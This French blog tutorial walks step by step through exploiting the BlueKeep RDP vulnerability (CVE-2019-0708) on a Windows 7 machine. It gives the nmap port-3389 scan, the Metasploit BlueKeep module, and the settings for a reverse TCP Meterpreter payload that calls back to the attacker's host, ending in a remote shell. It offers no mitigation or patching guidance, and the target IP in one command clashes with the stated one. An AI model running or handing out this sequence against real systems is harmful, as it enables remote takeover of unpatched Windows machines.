BlueKeep – Exploiter Windows (vulnérabilité RDP) à distance

Le protocole de bureau à distance (RDP) est un protocole de communication réseau sécurisé conçu pour la gestion à distance, ainsi que pour l’accès à distance aux bureaux virtuels, aux applications et à un serveur de terminal RDP.

RDP permet aux administrateurs réseau de diagnostiquer et de résoudre à distance les problèmes rencontrés par les abonnés individuels. RDP est disponible pour la plupart des versions du système d’exploitation Windows. RDP pour Apple macOS est également une option. Une version open source est également disponible.

Mais RDP présente une vulnérabilité sur Windows7, nous allons donc en faire la démonstration aujourd’hui. Alors ouvrons une invite de commande et commençons.

RDP fonctionne sur le port 3389 TCP, donc nous devrons d’abord voir si le périphérique que nous attaquons utilise ce protocole. Pour cela, nous allons utiliser nmap et spécifier le port 3389 dans notre scan. Tout ce dont nous avons besoin est l’IP de la machine Windows7. La nôtre dans ce cas est 192.168.100.84.

nmap -sV -p 3389 192.168.100.84

La commande ci-dessus va scanner, en cherchant spécifiquement à voir si le port 3389 est utilisé, nous pouvons voir que le drapeau -p indique le port. Voyons donc les résultats du scan.

bk1.PNG

Comme nous pouvons le voir, notre boîte Windows7 utilise effectivement le port 3389. Maintenant, passons à l’exploitation. Tout d’abord, nous devrons ouvrir Metasploit.

msfconsole

Puis nous rechercherons l’exploit que nous cherchons, dans notre cas, Bluekeep.

search bluekeep

bk2.PNG

Donc ici nous pouvons voir deux exploits, tous deux pour Bluekeep, mais nous n’aurons besoin que de celui du bas. Donc utilisons-le.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

bk3

Une fois que nous pouvons voir l’exploit en rouge, nous savons que nous l’utilisons maintenant. Donc, cherchons un peu plus d’informations sur cet exploit.

info

bk4

Donc, cela nous donne une explication sur la façon dont cet exploit est capable de mal gérer les binds pour obtenir une exécution de code. Parfait. Ensuite, nous devrons indiquer à Metasploit l’IP de la machine Windows7 cible.

set RHOSTS 109.168.100.84

bk5.PNG

Une fois que cela est configuré, nous pouvons aller de l’avant et lui donner la charge utile que nous voulons utiliser, avec l’exploit, pour obtenir un shell TCP inverse.

set payload windows/x64/meterpreter/reverse_tcp

Donc, nous spécifions le système d’exploitation Windows, l’architecture 64 bits et nous demandons un reverse shell TCP avec une session Meterpreter. Deux autres choses que nous devons faire est de donner à Metasploit l’IP de notre machine attaquante et le numéro de port à écouter.

set LHOST 192.168.100.237set LPORT 4444

bk7

Nous spécifions le port 4444 à écouter simplement parce que nous savons qu’il n’y a pas d’autre service fonctionnant sur ce port. Donc maintenant, nous voulons voir quelle option de cible Metasploit nous donne.

show targets

bk8

Nous savons déjà de notre scan nmap plus tôt que la boîte Windows7 fonctionne sur VMWare, Virtualbox pour être précis, donc nous allons choisir le numéro 2 dans la liste.

set target 2

bk9

Si vous avez tout cela mis en place, la dernière étape consiste à exploiter la machine cible.

exploit

bk10.PNG

Nous pouvons voir que l’exploit tente de fonctionner. Nous pouvons également voir qu’il nous indique que la cible est vulnérable. Cet exploit devrait juste prendre une minute pour que le code s’exécute.

bk11

BOOM ! !! nous avons un shell Meterpreter de la machine cible ! !! Voilà comment Bluekeep fonctionne.

Merci de lire les gars, revenez pour d’autres posts comme celui-ci et donnez-nous des suggestions sur ce que vous aimeriez que nous publiions.

Aussi, n’oubliez pas de vous abonner, de partager et d’aimer, merci d’avance ! !!

.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.